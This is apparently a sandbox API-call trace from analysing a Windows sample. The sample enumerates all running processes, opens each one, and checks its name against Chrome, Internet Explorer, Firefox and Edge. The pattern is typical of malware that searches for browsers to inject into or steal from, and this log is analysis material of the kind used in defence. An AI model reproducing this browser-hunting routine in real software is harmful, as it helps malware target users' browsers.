	[0255.800] StrStrIA (lpFirst="net.exe", lpSrch="chrome.exe") returned 0x0
	[0255.801] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.801] StrStrIA (lpFirst="net.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.801] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.801] StrStrIA (lpFirst="net.exe", lpSrch="firefox.exe") returned 0x0
	[0255.801] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.801] StrStrIA (lpFirst="net.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.801] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xd70, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 0
	[0255.802] CloseHandle (hObject=0x4fd0) returned 1
	[0255.802] Sleep (dwMilliseconds=0x64) 
	[0255.903] GetCurrentProcessId () returned 0x110
	[0255.903] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0255.906] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0255.907] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0255.908] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0255.909] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0xb0fc
	[0255.909] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.909] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0255.909] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.909] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.910] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.910] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0255.910] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.910] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.910] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0255.911] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0xb100
	[0255.911] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.911] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0255.912] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.912] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.912] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.912] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0255.913] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.913] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.913] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0255.914] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0xb104
	[0255.914] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.914] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0255.914] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.914] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.915] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.915] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0255.915] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.915] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.915] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0255.916] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0xb108
	[0255.917] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.917] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0255.917] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.917] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.917] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.917] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0255.918] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.918] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.918] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0255.919] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0xb10c
	[0255.919] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.919] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0255.919] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.919] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.920] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.920] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0255.920] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.920] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.920] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0255.921] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0xb110
	[0255.921] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.921] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0255.921] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.921] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.922] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.922] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0255.922] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.922] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.922] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0255.923] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0xb114
	[0255.923] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.923] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0255.924] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.924] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.924] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.924] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0255.924] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.924] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.924] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0255.925] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0xb118
	[0255.925] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.925] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0255.926] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.926] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.926] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.926] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0255.926] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.926] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.926] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0255.927] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0xb11c
	[0255.927] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.927] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0255.928] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.928] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.928] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.928] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0255.928] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.928] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.928] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0255.929] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0xb120
	[0255.929] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.929] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0255.930] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.930] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.930] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.930] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0255.930] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.930] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.931] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0255.931] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0xb124
	[0255.931] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.931] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0255.932] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.932] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.932] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.932] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0255.932] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.932] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.933] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0255.933] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0xb128
	[0255.934] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.934] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0255.934] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.934] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.934] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.934] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0255.935] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.935] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.935] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0255.936] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0xb12c
	[0255.936] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.936] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0255.936] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.936] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.937] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.937] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0255.937] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.937] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.937] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0255.938] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0xb130
	[0255.938] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.938] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0255.938] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.938] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.939] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.939] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0255.939] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.939] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.939] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0255.940] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0xb134
	[0255.940] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.940] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0255.941] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.941] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.941] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.941] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0255.941] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.941] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.941] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0255.942] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0xb138
	[0255.942] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.942] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0255.943] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.943] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.943] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.943] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0255.943] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.943] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.944] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0255.944] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0xb13c
	[0255.944] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.944] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0255.945] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.945] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.945] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.945] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0255.945] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.945] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.946] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0255.946] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0xb140
	[0255.947] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.947] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0255.947] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.947] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.947] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.947] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0255.948] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.948] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.948] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0255.949] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0xb144
	[0255.949] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.949] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0255.949] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.949] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.949] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.949] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0255.950] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.950] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.951] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0255.951] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0xb148
	[0255.952] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.952] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0255.952] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.952] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.952] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.952] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0255.953] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.953] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.953] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0255.954] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0xb14c
	[0255.954] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.954] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0255.954] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.954] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.954] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.954] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0255.955] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.955] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.955] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0255.956] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0xb150
	[0255.956] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.956] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0255.956] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.956] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.957] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.957] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0255.957] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.957] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.960] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0255.961] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0xb154
	[0255.961] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.961] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0255.961] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.961] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.961] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.961] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0255.962] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.962] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.962] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
